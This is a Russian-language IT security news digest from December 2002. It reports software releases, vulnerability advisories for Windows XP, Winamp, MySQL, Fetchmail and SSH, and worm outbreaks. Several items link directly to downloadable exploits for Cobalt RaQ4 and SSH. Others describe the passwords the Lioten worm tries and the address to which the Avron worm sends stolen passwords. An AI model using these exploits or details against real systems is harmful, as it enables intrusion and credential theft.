Высокотехнологичные компании США пытаются предотвратить воплощение в жизнь обещание Министерства Обороны о вводе в действие ограничения на использование радиочастот беспроводными локальными сетями (WLAN). В этом месяце официальные представители Пентагона заявили о своей озабоченности по поводу расширения радиоспектра для WLAN, поскольку в результате этого расширения могут возникнуть помехи для военных радарных систем. Руководство Microsoft, Intel и Cisco встретилось с представителями министерства для того, чтобы успокоить военных и рассказать о том, что Wi-Fi (синоним WLAN) - это луч света на помрачневшем рынке телекоммуникаций. Однако военные не отказались от намерения ввести технические ограничения, необходимые для национальной безопасности, поскольку, по их словам, маломощное излучение WLAN способно заглушить до 10 типов разных радаров, в том числе и отслеживающих штормы, самолеты и наводящих ракеты и другое оружие. Источник - http://www.cnews.ru
19/12/2002 20:27 С днем рождения, Perl!
Популярному интерпретатору вчера исполнилось 15 лет. Вероятно, мало кто знает о том, что 18 декабря 1987 года Ларри Уолл (Larry Wall) выпустил в свет интерпретатор perl 1.0. Это была первая реализация языка Perl, доступная широкой публике. Он был во многом не похож на более привычный Perl 5 (которому в этом году исполнилось 7 лет), но, тем не менее, именно с него началось сообщество Perl, pumkin'ы, и, в конечном итоге, тот феномен, который мы имеем сейчас (как сказал Владимир Маслов: "Perl - это не просто язык обработки текстов. Это философия!"). В общем, команда UINC присоединяется к www.linuxcenter.ru (откуда взят текст этой новости) с пожеланиями удачи и процветания языку Perl! Сайт по использованию Perl - http://use.perl.org/
19/12/2002 19:24 Дыры в RealOne Player, наконец, залатали.
Компания RealNetworks выпустила новый вариант заплатки для программы RealOne Player. Заплатка ликвидирует девять различных уязвимостей. Большинство из них связаны с ошибками переполнения буфера, которые могут использоваться для захвата управления компьютером или приводить к "падению" самого RealOne Player. Дыры в RealPlayer были обнаружены еще в ноябре, и тогда же RealNetworks сразу выпустила заплатку. Вскоре, однако, выяснилось, что выпущенная заплатка не решает проблем с безопасностью. И хотя продемонстрировать возможность атаки посредством переполнения буфера для запуска "враждебного" кода не удалось, RealNetworks объявила о разработке более совершенной заплатки. Заплатка была выпущена в вариантах для RealOne Player и RealOne Player v2 для Windows, RealOne Player для Mac OS X, а также RealOne Enterprise Desktop Manager и RealOne Enterprise Desktop. Всем пользователям указанных продуктов рекомендуется скачать нужную заплатку с сайта компании. Инофрмация с compulenta.ru. Информация о заплатах - http://service.real.com/help/faq/security/bufferoverrun_update.html
19/12/2002 16:42 Выход CRUX 1.0.
Ещё один из многочисленных дистрибутивов Linux. CRUX - простой, собранный под i686, очень легкий (iso -- 188Мб) дистрибутив использующий минималистическую BSD-подобную систему скриптов, tar.gz пакеты и свою систему портов. CRUX предназначен для "ручного" администрирования и не содержит никаких лишних файлов (вроде одной и той же документации в разных форматах, или mkfs.minix). В новой версии: kernel 2.4.20, glibc 2.3.1, setfont и шрифты в пакете kbd, поддержка JFS и еще более 50 обновлений различных пакетов. Взято с linux.org.ru. Сайт проекта - http://crux.nu/
19/12/2002 16:13 Уязвимости в версиях Winamp.
Та же самая Foundstone Inc. сообщает об уязвимости в популярном MP3-плеере Winamp. Все они связаны с переполнениями буферов в версиях Winamp: версия 2.81 - одна возможность переполнения, версия 3.0 - две возможности. Обе они связаны с возможностью формирования длинного содержимого тега Artist ID3v2, а в версии 3.1 к ней также добавляется возможность переполнения буфера в теге Album ID3v2 аудио-файла MP3. Версия 2.81 просто рушится при этом переполнении, а вот версия 3.0 ведёт себя намного опаснее - при загрузке специально сформированного файла через окно Media Library возможна полная компрометация системы с возможностью выполнения удалённого кода. Фирма Nullsoft обновила обе версии Winamp. Для устранения уязвимости 2.81 необходимо скачать обновлённую версию 2.81. Версия 3.0 с build #488, созданного после 15 декабря сего года уже не содержит этой уязвимости (узнаётся из пункта меню "About Winamp3"). Подробности - http://www.foundstone.com/advisories
19/12/2002 15:41 Уязвимость в Windows XP при попытке просмотра медиа-файлов.
Tony Bettini из Foundstone Inc. сообщает подробности уязвимости, обнаруженной им в ОС Windows XP (код CAN-2002-1327). Возникает при попытке просмотра при помощи Explorer-а атрибутов медиа(аудио, если говорить более конкретно) - файлов расширений .MP3 и .WMA (Windows Media Audio). Для эксплуатации уязвимости удалённый атакующий должен создать "злонамеренный" (использующий уязвимость) медиа-файл и каким-либо из способов "подсунуть" его несчастной жертве (либо методом социальной инженерии - посылка, например, письма со ссылкой на Вэб-ресурс (NetBIOS - шару)). При этом файл не обязательно даже проигрывать, достаточно будет того, чтобы он был помещён в стандартную download-директорию. После наведения на него мышки в WinXP и попытке показа атрибутов файла на компютере жертвы может быть выполнен любой происзвольный код. При просмотре специально сформированной ссылки в Интернете посредством IE код также будет независимо от настроек безопасности IE. Особую опасность уязвимость представляет для пользователей Outlook при указании в теге <IFRAME> NetBIOS - шары на опсаный .MP3-файл. Как указывается, подобная уязвимость присутствует только в WinXP и не присуща другим версиям M$-ОС. Фирма Microsoft устранила уязвимость, выпустив бюллетень по безопасности MS02-72 на прошлой неделе при помощи патча Q329390. Подробное описание - http://www.foundstone.com/advisories
19/12/2002 14:31 Уязвимость во многих XML-анализаторах.
Обнаружена довольно неприятная уязвимость в анализаторах языка XML многих производителях. Неверная процедура разбора DTD-структуры XML-документа может привести к зависанию системы. Уязвимости подвержены анализаторы следующих производителей: Expat Developers Expat XML parser, Apache Group Xerces XML parser, IBM WebSphere, Sun Microsystems SunONE, Apache Group Apache Axis, Macromedia ColdFusion/MX & Jrun, Sybase EAServer, BEA WebLogic, HP. Macromedia, Sybase и BEA WebLogic выпустили патчи для своих продуктов. Подробности - http://archives.neohapsis.com/archives/bugtraq/2002-12/0140.html
19/12/2002 13:57 Новый класс Вэб-атак.
ACROS Security из Словении опубликовала в Интернете документ, описывающий новый тип атаки на Вэб-приложения, который сами авторы назвали термином "session fixation"-атаки (атаки фиксации сессии?). Документ может представлять огромный интерес для разработчиков Вэб-приложений и аналитиков компьютерной безопасности. Выложен в PDF-формате. Скачать - http://www.acros.si/papers/session_fixation.pdf
19/12/2002 13:39 В сети выложены исторические архивы "blackhat" сообщества.
Сообщается об открытии на сайте www.8200.org, занимающегося исследованием Интернета ( в лице Liraz Siri ) нового раздела под названием 'Historical blackhat archives'. Раздел содержит уникальные документы сообщества "blackhat" ( не путать с термином "Whitehat" - исследователи компьютерной безопасности ): журналы, посвящённые хакерству, исходные коды и другие эксклюзивные материалы, датированные аж с 97-го года. Многие материалы выпущены для широкой публики впервые. Сайт проекта - http://www.8200.org/
19/12/2002 13:05 "Червь" Lioten выводит из строя ИТ-сети.
Вирусная лаборатория компании Panda Software обнаружила компьютерного червя Lioten (W32/Lioten), заражение которым приводит к коллапсу работы ИТ-сетей. Lioten не выполняет никаких деструктивных действий и может заражать компьютеры только с операционными системами Windows NT, 2000 и XP. Червь, однако, может очень быстро распространяться, и это существенно сказывается на производительности зараженных им серверов. Lioten распространяется через интернет, а когда попадает на удаленный компьютер, копирует себя в системный каталог Windows под именем "Iraq_oil.exe". После этого он создает произвольный IP-адрес, чтобы подключиться к сетевому компьютеру. Lioten включает в себя несколько паролей (например, "admin", "server" или "root"), которые он использует для установления соединений с сетевыми компьютерами. Когда червь подключается к удаленному компьютеру, он копирует себя на этот компьютер, а затем ищет свои будущие жертвы. Источник - http://www.cnews.ru
18/12/2002 17:53 Вышла вторая бета-версия браузера Opera 7.
Компания Opera Software представила очередную бета-версию своего браузера для семейства операционных систем Windows. В новой версии добавлена поддержка стандартов DOM level 2 и CSS2, улучшена обработка страниц, использующих ECMAScript (стандартизованная часть Java Script) и HTML 4.01. Норвежская компания позволила себе отступить от безусловного следования только стандартами W3C и в Opera 7, наконец, появится поддержка "нестандартного" DHTML. Появится новая функция автоматического доступа к сайтам, защищенным паролем. Если пароль для доступа будет находиться в памяти браузера, то поле для ввода пароля будет отмечено пиктограммой золотого кольца. Чтобы поля имени и пароля заполнились автоматически, будет достаточно нажать кнопку с изображением "волшебной палочки". Браузер поддерживает работу с несколькими пользователями. Opera 6 позволяла предварительно задавать тип интерфейса для работы с web-страницами: MDI или SDI, т. е. в одном окне или в нескольких. Теперь это можно делать "на ходу" и даже сочетать разные типы. Расположение окон и их тип сохраняются в файлах оконных сессий. Подробнее - http://www.cnews.ru/news/ebusiness/2002/12/18/20021218172445.shtml
18/12/2002 14:43 Эксплоит для удалённого взлома Cobalt RaQ4.
На голландском севере выложен эксплоит, предназначенный удалённо взламывать Cobalt RaQ4-сервер с установленным Security Harderning Package (SHP) (мы сообщали об этой уязвимости ранее в новостях). Представляет собой исходник на языке С для *nix-ОС. Скачать - http://www.i-security.nl/files/raqrewt.c
18/12/2002 14:19 Исследователи предупреждают о наличии серьёзной уязвимости в SSH.
Исследователи компьютерной безопасности из Rapid 7 Inc. (Нью-Йорк, США), предупреждают об обнаружении серьёзной уязвимости во всех реализациях протокола SSH v.2, предназначенного для удалённого криптозащищённого подключения к удалённым серверам. Наличие уязвимости повзволяет выполнить на удалённой машине произвольного кода. Особую опасность она представляет ввиду того, что позволяет удалённо подключиться до проведения процедуры аутентификации. Более подробно - http://www.eweek.com/article2/0,3959,768388,00.asp Эксплоит - http://packetstorm.linuxsecurity.com/0212-exploits/sshredder.zip
18/12/2002 13:56 Статья "Взлом и защита Citrix".
Citrix – это приложение удаленного рабочего стола (Remote Desktop), становящееся очень популярным. Он похож на Terminal Services у Microsoft. Но, в отличие от Terminal Services, Citrix позволяет администраторам задавать приложения, которые могут запускаться на сервере. Это позволяет контролировать, какие программы могут использовать конечные пользователи. Существует целая тема, посвященная безопасности Citrix приложений, вследствие смешения технологий Citrix и Microsoft. Серьезная угроза возникает при получении пользователями доступа не только к обычным программам, а и к удаленным рабочим столам. Terminal Services у Microsoft используют RDP, в то время как Citrix использует ICA (Independent Computing Architecture). В статье на сайте ww.securitylab.ru рассказывается, как работает Citrix, и какие недостатки существуют в способе, которым Citrix обрабатывает пользовательский доступ к программам. Статья - http://www.securitylab.ru/?ID=34965
18/12/2002 12:39 Microsoft усиливает защиту в .Net.
В понедельник компания выпустила программный инструментарий, который, как она утверждает, позволит разработчикам создавать более надежные и защищенные веб-сервисы. Microsoft представила Web Services Enhancements (WSE) 1.0, пакет дополнений к своему инструментальному программному обеспечению .Net, отвечающий последним стандартам безопасности, маршрутизации сообщений и передачи файловых вложений через веб-сервисы. Разработчики могут загрузить этот пакет бесплатно и использовать его совместно с комплектом инструментов разработки Microsoft Visual Studio.Net. За прошедший год Microsoft в рамках своей инициативы .Net выпустила ряд инструментов программирования и ПО, обеспечивающих соответствие приложений стандартам веб- сервисов. Новые инструменты отвечают стандарту Web Services Security (WS-S), разработанному совместно IBM и Microsoft. Оригинальный набор стандартов веб-сервисов не охватывает средства защиты, а соответствие WS-S и другим спецификациям безопасности имеет важное значение для освоения веб-сервисов корпорациями. Подробности - http://www.zdnet.ru/?ID=293300http://www.zdnet.ru/?ID=293300
18/12/2002 12:25 SuSE опережает Red Hat по простоте эксплуатации.
Думаете переходить на Linux? Новичков, вероятно, привлечет простота пользования SuSE, зато Red Hat отличается стабильностью и широкой поддержкой шрифтов. Пользователям Windows, думающим о переходе на Linux — для постоянной работы или в качестве второй загружаемой операционной системы, — нужно выбирать SuSE ввиду простоты ее эксплуатации. Однако более опытные пользователи предпочитают Red Hat за стабильность этого дистрибутива и его возможности по управлению шрифтами. Поединок между двумя наиболее популярными дистрибутивами операционной системы с открытым исходным кодом показал, что у каждого из них есть свои преимущества, но для неопытных пользователей лучший выбор — SuSE. В числе сильных сторон SuSE 8.1 Profesional ZDNet Labs называет простоту установки, отмечая автоматическое изменение размера сегментов жесткого диска и великолепный инструментарий конфигурирования. Подкачало лишь управление шрифтами. Полный текст - http://www.zdnet.ru/?ID=293175
18/12/2002 12:01 Червь "Avron" ворует пароли подобно троянцу.
"Лаборатория Касперского" сообщает об обнаружении нового интернет-червя "Avron", который содержит троянскую процедуру, ворующую пароли. Червь представляет собой приложением Windows (PE EXE-файл) размером около 26K и написан на языке Microsoft Visual C++. При рассылке зараженных писем червь использует прямое подключение к SMTP-серверу. Адреса, по которым происходит рассылка, считывает из адресной книги Windows (WAB). Также ищет адреса в файлах с расширениями: .DBX .MBX .WAB .HTML .EML .HTM .ASP .SHTML. В своих письмах "Avron" также случайно использует брешь в системе защиты "IFrame". При рассылке червь создаёт временный файл "NewBoot.sys" во временном каталоге Windows. Червь также создаёт в каталоге Windows файл "listrecp.dll" и записывает в него обнаруженные адреса электронной почты. Червь считывает кешированные пароли и отправляет их на адрес "otto_psws@pochta.ws" в письме с заголовком "Password Got". По 7-м и 24-м числам "Avron" запускает процедуру, которая случайно перемещает курсор мыши и открывает Web- страницу: http://www.avril-lavigne.com Подробное описание - http://www.viruslist.com/index.html?tnews=1003&id=1497060
18/12/2002 11:48 ОС Lindows скоро будет продаваться в розницу.
Компания Lindows.com объявила о начале распространения операционной системы LindowsOS через реселлеров. До сих пор эта ОС продавалась в комплекте с готовыми компьютерами, преимущественно дешевыми, и через веб-сайт Lindows.com. Напомним, что LindowsOS представляет собой операционную систему на базе Linux, способную выполнять многие популярные приложения для Windows. Это достигается за счет использования эмулятора, прототипом для которого послужил эмулятор с открытым кодом Wine. Позиционируется LindowsOS как недорогая и функциональная альтернатива Windows. В настоящее время компания предлагает уже третью версию своей операционной системы. Компьютеры на базе Lindows достаточно активно продаются в США. К примеру, на сайте Walmart.com такой компьютер производства компании Microtel можно приобрести за 200 долл. США. В некоторых обзорах, однако, указывается, что качество сборки этих компьютеров весьма и весьма низкое. Подробности - http://www.compulenta.ru/2002/12/18/36412/
18/12/2002 11:26 Смерть Mac OS 9 отложена до июня 2003 года.
Пользователи Mac смогут чуть дольше покупать системы с операционной системой Mac OS 9, сообщает компания Apple Computer. Изменив свое первоначальное решение оставить с января на новых ПК в качестве системы только Mac OS X, компания отодвинула этот печальный для OS 9 момент до июня, по крайней мере, для нынешних моделей Mac. В то время как представители компании утверждают, что около 80% профессиональных пользователей Mac работают сейчас под Mac OS X, Apple будет продолжать поставки нынешней высокопроизводительной линии Power Mac G4 с опцией загрузки Mac OS 9 в ближайшие 6 месяцев. Это объясняется тем, что отдельные пользователи до сих пор работают в приложениях под старую ОС, в частности, в QuarkXPress. Редакция этой популярной издательской программы под Mac OS X должна выйти не ранее середины будущего года. Источник - http://www.cnews.ru
18/12/2002 11:13 С Дмитрия Склярова и "Элкомсофт" сняты все обвинения.
Жюри присяжных полностью оправдало российскую компанию "Элкомсофт" по всем пунктам обвинения. Окружной суд присяжных города Сан-Хосе (США) также признал полностью невиновным и ее сотрудника - российского программиста Дмитрия Склярова, обвиненного, как и компания, в нарушении "закона о защите авторских прав в цифровую эпоху" - DMCA, Digital Millenium Copyright Act. Вчерашнее решение суда полностью снимает все обвинения, выдвинутые ранее г-ну Склярову и фирме "Элкомсофт" в связи с нарушением по 5 пунктам закона США "О защите интеллектуальной собственности в интернете" путем создания программы, позволяющей "обходить" защиту электронных книг компании Adobe. Дмитрий Скляров стал первым человеком, обвиняемым в нарушении этого спорного закона. Тем временем представитель защиты Джо Бартон не исключает, что обвинение подаст апелляцию на данное решение суда. Подробности - http://zdnet.com.com/2100-1106-978176.html
17/12/2002 23:7 Завершены судебные слушания по делу автора программы DeCSS.
Все закончилось слишком хорошо для Йона Леха Йохансена, разработчика программы DeCSS для взлома защиты DVD от копирования. Согласно обвинению, у "хакера" могут конфисковать все его компьютеры, наложить на него штраф в размере 1400 долл. США в качестве компенсации судебных издержек и приговорить к трем месяцам лишения свободы условно, что безусловно является слишком мягким приговорм для взлома повлекшего к массовому пиратству DVD продукции. Хотя, можно сказать, что Йохансен, это своеобразный козел отпущения, так как указывается, что алгоритмы для дешифровки передали ему другие хакеры, а он всего лишь приделал к ним "оболочку" и выпустил ее. Получит по заслугам за то, что решил прибавить себе известности используя чужие труды. Источник: http://www.compulenta.ru/2002/12/17/36409/
16/12/2002 14:05 Вирусов - немеряно!
Компания MessageLabs, по ее собственному заявлению, остановила(удалила) 9.3 миллиона вирусов из общего числа писем в 2 миллиарда. Нормальным языком это значит наличие почты/червя в каждом 215-почтовом сообщении. Подробнее - http://news.com.com/2100-1001-977945.html?tag=fd_top
16/12/2002 11:55 Вопросы к Путину
А сегодня Правительство решило с нами в "народ" поиграть! Задай свой вопрос Путину! Задать вопрос - http://www.linia2002.ru
15/12/2002 12:31 Хакеры готовят пользователям рождественские "подарки".
Канун рождественских праздников является одним из самых опасных периодов для компьютерных пользователей. Именно в это время активизируются хакеры и распространители вирусов, сообщает сайт Vnunet.com со ссылкой на специалиста в области информационной безопасности из компании Integralis, Донала Кейси. По мере приближения праздников значительно возрастает количество посетителей онлайновых магазинов и почтовых веб-узлов. В это время бдительность большинства пользователей снижается, и поэтому они не принимают необходимых мер предосторожности при получении электронных посланий от людей, о которых не слышали в течение нескольких месяцев. Во избежание возможного проникновения вирусов системным администраторам следует ограничить доступ пользователей к почтовым веб-узлам, поскольку они не содержат необходимых фильтров и могут позволить злоумышленникам несанкционированно проникнуть в сеть. Следует также избегать посещения сайтов, созданных с применением технологий флэш, Active-X и им подобных. Просмотр такого рода сайтов требует активного использования пропускной способности аппаратных средств и облегчает проникновение в сеть опасных кодов. Подробности - http://www.vnunet.com/News/1137519
15/12/2002 12:13 Танкер "Престиж" всплыл в виде компьютерного вируса.
Производителиьантивирусного программного обеспечения Panda сообщили о появлении нового интернет-червя, связанного с недавней катастрофой нефтяного танкера "Престиж" у берегов Испании. По данным журнала ZDNet, вирус распространяется по электронной почте в виде пустого послания с темой "fotos INEDITAS del PRESTIGE en el fondo del Atlantico" ("Эксклюзивные фотографии танкера "Престиж" на дне Атлантического океана"). К письму, отправленному с адреса Fotos_PresTiGefreeserver@nautilus.org, прикреплено приложение Prestige.zip. После разархивирования пользователь получает предложение запустить файл prestige.exe. В случае запуска зараженного приложения на экране монитора появляется сообщение на испанском языке. Пользователю предлагается установить некое приложение, с помощью которого якобы можно просматривать эксклюзивные фотоснимки находящегося на глубине 3500 метров танкера "Престиж". Попытка установить приложение для просмотра уникальных фотографий завершается сообщением об инсталяционной ошибке. Однако в реальности вирус устанавливается на жесткий диск компьютера и самостоятельно рассылает себя по всем адресам, содержащися в адресной книге почтовой программы. Подобно вирусу Typ Worm 32 новый червь также может распространяться через IRC-каналы. Кроме того, "Престиж" способен проникать в реестр ОС Windows и самостоятельно запускаться при каждом новом включении компьютера. Впрочем, специалисты Panda не причисляют "Престиж" к особо опасным вирусам. Источник - http://www.lenta.ru
15/12/2002 12:05 Выход новых версий Mozilla.
На сайте www.mozilla.org сообщается о выходе альфа-версии броузера Mozilla 1.3. Основные улучшения касаются почтового клиента: были добавлены базовые функции для борьбы со СПАМом, улучшены фильтры, исправлена работа с некоторыми IMAP-серверами. Тем временем команда ALT Linux выпустила локализованную русскую версию Mozilla 1.2.1. Пресс-релиз Mozilla 1.3a - http://www.mozilla.org/releases/mozilla1.3a/ Русская Mozilla 1.2.1 - ftp://ftp.altlinux.ru/pub/distributions/ALTLinux/Mozilla/1.2.1
15/12/2002 11:251 OS X может быть и на вашем PC.
Компания Apple со всей серьезностью рассматривает возможность выпустить в открытую продажу Marklar, версию операционной системы OS X для Intel-процессоров, находящуюся сейчас в разработке. Такой ход может иметь для Apple стратегическое значение. Поначалу Marklar разрабатывался в качестве резервной системы - на случай, если чип PowerPC падет в битве с Intel. Теперь же стратеги Apple полагают, что Marklar вполне сможет побороться за сердца пользователей PC, конкурируя c системой Windows. Если эти смелые планы будут воплощены в жизнь, пользователи PC смогут почти безболезненно заменить на своих компьютерах Windows на OS X. Apple вынужден продумывать такой путь ведения будущих битв на компьютерном рынке, поскольку видит в этом реальную возможность отгрызть изрядную рыночную долю у Windows. Почему именно сейчас? Microsoft вот-вот представит миру Palladium - версию операционной системы, которая будет решать за пользователя, разрешить ли ему копировать музыкальный и видеоматериал, защищенный копирайтом. И пользователи уже опасаются, что чаще всего решение это будет не в их пользу. Marklar же, напротив, не имеет никаких встроенных ограничителей, что позволяет Apple обратиться к обиженным пользователям Windows напрямую и сказать: вот видите, а мы предоставляем вам право самим решать, как использовать ваш компьютер. Источник - http://www.cnews.ru
14/12/2002 22:08 Эстонские студенты угрожают национальной безопасности.
Компьютерная преступность становится все моложе. В Эстонии, например, студенту удалось привести в панический ужас госструктуры, работающие с использованием компьютерных сетей. Пока еще неизвестны все последствия произошедшего, но сам факт взлома главной компьютерной системы Эстонии студентом приводит к невеселым размышлениям о ее надежности. 19-летний последователь Митника, постигающий азы компьютерной грамотности в Таллиннском политехническом университете, сумел получить доступ к самым важным данным о компьютерных системах госучреждений. Данные эти были защищены, но сама степень их защиты теперь подвергается серьезным сомнениям. Невольным пособником студента-хакера выступила фирма "Привадор". Именно взлом ее сервера позволил юноше получить доступ к информации госучреждений и частных фирм республики. О том, насколько тяжелыми будут последствия для клиентов "Привадора", пока ничего не известно Источник - http://www.runet.ru/news/1953.html
14/12/2002 21:43 Выход 105 номера сетевого журнала "Невод".
На сайте russ.ru выложен 105-й номер периодического электронного журнала "Невод", выпускаемый Татьяной Даниловой и посвящённый обзору текущих сетевых событий и публикаций. Журнал "Невод" - http://www.russ.ru/netcult/nevod/20021211.html
14/12/2002 17:42 Как построить собственный HONEYNET.
На сайте HoneyNet Project опубликован документ под названием "Know Your Enemy - Learning with User-Mode Linux", предназначенный для пошагового описания процесса создания HONEYNET - сервера, предназначенного для изучения методов взлома, применяемых в настоящее время хакерами. Создание сервера основано на User-Mode Linux (UML) - OpenSource решении для создания виртуальной машины на сервере. Поддерживается Jeff Dike и позволяет на одном сервере создать несколько виртуальных Linux-серверов. Фактически это некое подобие VMware, однако в данном случае решение ограничено только Linux-сервером. Построение HoneyNet в данном случае ограничено применением UML и IPTables. Документ представляет собой типичную структуру документов HOWTO в LINUX. Состоит из 5-ти частей: в первой описываются основы UML, а такж процесс инсталляции и конфигурирования, вторая часть описывает процесс построения сети на одном физическом сервере, третья часть описывает, как управлять данными HoneyNet при помощи IPTables, в четвёртой части описан процесс интерпретации захваченных пакетов при помощи snort, пятая, заключительная, часть описывает процесс тестирования того, что у Вас получилось. :) Документ может быть рекомендован специалистам по безопасности, системным администраторам, столкнувшимся с необходимостью построения HoneyNet. Cтатья - http://www.honeynet.org/papers/uml/
14/12/2002 17:25 Статья "Мини-руководство по созданию Makefile-ов".
Опубликована статья, представляющая собой небольшое руководство по созданию Makefile-ов. В ней объясняется для чего нужен Makefile и дается несколько правил, которых следует придерживаться при его создании. Автор перевода - Андрей Киселёв, автор оригинальной статьи "Creating Makefiles: A Mini Tutorial" в linuxgazette.com - Tedi Heriyanto. Будет полезна новичкам, делающих первые шаги в программировании в *NIX-ОС. Статья - http://gazette.linux.ru.net/lg83/heriyanto.html
14/12/2002 17:16 В Linux-серверах Cobalt от Sun обнаружена уязвимость.
Злоумышленник может получить полный контроль над Linux-сервером Sun's Cobalt RaQ 4, как локально, так и через Интернет. Такая информация была опубликована компанией Sun совместно c CERT 12 декабря. Атаке подвержены только те сервера, администраторы которых установили пакет "Security Hardening Package". Уязвимость возникает из- за ошибки в процедуре проверки ввода в CGI-скрипте, обеспечивающем удаленное администрирование сервера через Web. Исправлений для нее пока не выпущено. От ошибки можно избавиться, удалив Security Hardening Package целиком, однако при этом будет также утеряна защита от ошибок переполнения буфера и сканирования портов. Подробности - http://www.extremetech.com/article2/0,3973,763032,00.asp
14/12/2002 16:12 Патч от Microsoft MS02-071.
Microsoft выпустила 11 декабря бюллетень по безопасности с кодом MS02-071, который описывает уязвимость в сообщении WM_TIMER, использование которой позволяет локально повысить привилегии в ОС Windows NT 4.0, ХР, 2000. Описание уязвимости достаточно точно описано на сервера www.securitylab.ru, откуда мы его и цитируем. Сообщения Windows обеспечивают средство для интерактивных процессов, позволябщие реагировать на пользовательские события (например, нажатия клавиши или движения мыши) и связываться с другими интерактивными процессами. Одно такое сообщение, WM_TIMER, посылается по истечению таймера, и может использоваться, чтобы заставить процесс выполнять функцию повторного вызова таймера. Уязвимость позволяет одному процессу использовать WM_TIMER сообщение, чтобы заставить другой процесс выполнять функцию повторного вызова, даже если второй процесс не устанавливал таймер. Если второй процесс имеет более высокие привилегии, чем первый, то первый процесс сможет выполнить произвольный код с повышенными привилегиями. По умолчанию, несколько процессов запущенных в рабочем столе, выполняются с LocalSystem привилегиями. В результате, низкопривилегированный пользователь может получить полный контроль над уязвимой системой. Соответственно, фирма Microsoft выпустила патч. Исчтоник - http://www.microsoft.com/technet/security/bulletin/MS02-071.asp
14/12/2002 15:51 Уязвимость в Fetchmail.
Тот же самый Стефан Эссер сообщает о нахождении уязвимости в Fetchmail (версии до 6.1.3). Обнаруженное переполнение буфера может позволить удалённому атакующему как нарушить функционирование Fetchmail, так и к возможности выполнения произвольного кода от имени пользователя Fetchmail (в некоторых случаях это может быть и суперпользователь). Связана уязвимость с обработкой заголовков почты, которая носит название reply-hack. Заголовки письма просматриваются на предмет наличия локальных адресов (без знака "@" и имени домена). В процессе разбора подставляется знак "@" и имя локалхоста. При резервировании необходимой памяти Fetchmail неверно выделяет её количество, что позволяет удалённому атакующему, сформировав определённый заголовок, использовать эту уязвимость. Подробные детали пока не раскрываются. В письме Стефан указывает, что выпущена версия Fetchmail 6.2.0, в которой подобной уязвимости нет. Подробности - http://security.e-matters.de/advisories/052002.html
14/12/2002 15:35 Множественные уязвимости в MySQL.
Стефан Эссер из немецкой группы e-matters выпустил бюллетень по безопасности, в котором костатируется факт наличия уязвимости в MySQL (версии <= 3.23.53a, <= 4.0.5a). В результате наличия уязвимости как клиент, так и сервер могут быть уязвимы удалённо. Две уязвимости в коде MySQL-сервера позволяют удалённо "погасить" сервер (crash), а одна из них также позволяет обойти проверку пароля MySQL и выполнить произвольный код с привилегиями пользователя, от имени которого запущен mysqld. В коде клиента были обнаружены также 2 уязвимости, одна позволяет переполнить размер кучи (heap) внутри библиотеки клиента, вторая позволяет записать '\0' к любому адресу памяти. Всё вышеописанное позволяет провести как атаку типа DoS на клиента MySQL, так и выполнить произвольный код на стороне клиента libmysqlclient. 12 декабря производителем выпущена версия MySQL 3.23.54, в которой нет этих уязвимостей и всем пользователям рекомендуется её обновить. Более подробно - http://security.e-matters.de/advisories/042002.html
14/12/2002 15:13 Описание уязвимости в формате PNG.
eEye Digital Security выпустила наконец детальное описание уязвимости в разборе графического формата PNG (Portable Network Graphics), на которую ссылалась фирма Microsoft при выпуске своего бюллетеня по безопасности MS02-066 в августе этого года, а также в описании Сервис-пака 1 для IE. В то время констатировался только сам факт уязвимости без его детального описания. И вот теперь eEye Digital Security посчитала себя вправе опубликовать детальное описание обнаруженной ей в августе уязвимости. Связана она с библиотекой pngfilt.dll (версии до 6.0.2600.0). Поскольку помимо IE и Outlook ещё многие пакеты используют библиотеку, уязвимости подвержено огромное количество программ, среди которых: Access 2000, BackOffice, DirectX 6.0 SDK, Microsoft Visual Studio .NET, Office (2000 и ХР), SQL Server, Visual C++ .NET и многие другие! Уязвимость связана с механизмом интерпретации данных формата PNG. Первая уязвимость связана с переключением заголовка IDAT. Вторая уязвимость может привести к выполнению произвольного кода и связана с некорректной обработкой кучи (heap) в функции inflate_fast() внутри библиотеки pngfilt.dll. Для более детального ознакомления рекомендуем посмотреть информации в URL, приведённом ниже. Подробности - http://www.eeye.com/html/Research/Advisories/AD20021211.html
14/12/2002 3:35 Уязвимость во всех версиях micq.
Согласно сообщениям с LinuxToday.com, все версии популярного консольного icq клиента micq, входящие в дистрибутив Linux Debian, некорректно обрабатывают приходящие сообщения, в которых в качестве разделителя используется не символ 0xFE. Получение такового приводит к аварийноому завершению работы приложения. Источник http://linuxtoday.com/news_story.php3?ltsn=2002-12-13-017-26-SC-DB-SW
13/12/2002 18:11 DALnet ослаблен DDoS-атаками.
Сообщается, что в прошлые выходные одна из самых больших и популярных сетей IRC-серверов DALnet испытывала трудности при попытках соединения многочисленных IRC-клиентов. Это было связано с крупнейшей DDoS-атакой за последнее время, одновременно проведённой на многочисленные сервера, составляющие сеть DALnet. В настоящее время администраторы IRC-серверов проводят работу по предотвращению атаки и ликвидации её последствий, что является довольно нетривиальной задачей. Подробности - http://www.theregister.co.uk/content/55/28515.html
13/12/2002 17:54 Сервер Сената США использовался в качестве прокси-сервера.
Вэб-сервер Сената США в течении длительного периода времени использовался в качестве "анонимайзера" - прокси-сервера, используемого для анонимного посещения Вэб-серверов в Интернете. Обычно подобные прокси-сервера свидетельствуют о достаточно невысокой квалификации системного администратора подобного сервера. поскольку это говорит о неверной (с точки зрения безопасности) настройке оного. О закрытии сервера www.senate.gov сообщил Tracy Williams, заведующий равитием технологий в Сенате. Подобные неправильно настроенные прокси-сервера зачастую позволяют взломать и внутреннюю (интранет) сеть, однако в данном случае было заявлено. что внутренней сети Сената ущерба нанесено не было. Прокси-сервер был обнаружен знаменитым хакером Адриано Ламо ещё в апреле этого года, о чём и было сообщено администраторам сети Сената. Однако сервер был отключён от Интернета только в прошедшие выходные. Подробности - http://online.securityfocus.com/news/1780
13/12/2002 17:59 Выход Netscape 7.01.
Вышла новая версия популярного браузера Netscape 7.01, который базируется на открытой технологии Mozilla 1.0.2. Пользователям браузера Mozilla следует прочитать заметки перед установкой Netscape 7.01 (см. ниже). Скачать - http://ftp.netscape.com/pub/netscape7/english/7.01/ Заметки - http://wp.netscape.com/eng/mozilla/ns7/relnotes/7.html#prefs
13/12/2002 17:06 Семинар "Антивирусные продукты Doctor Web для частных и корпоративных пользователей".
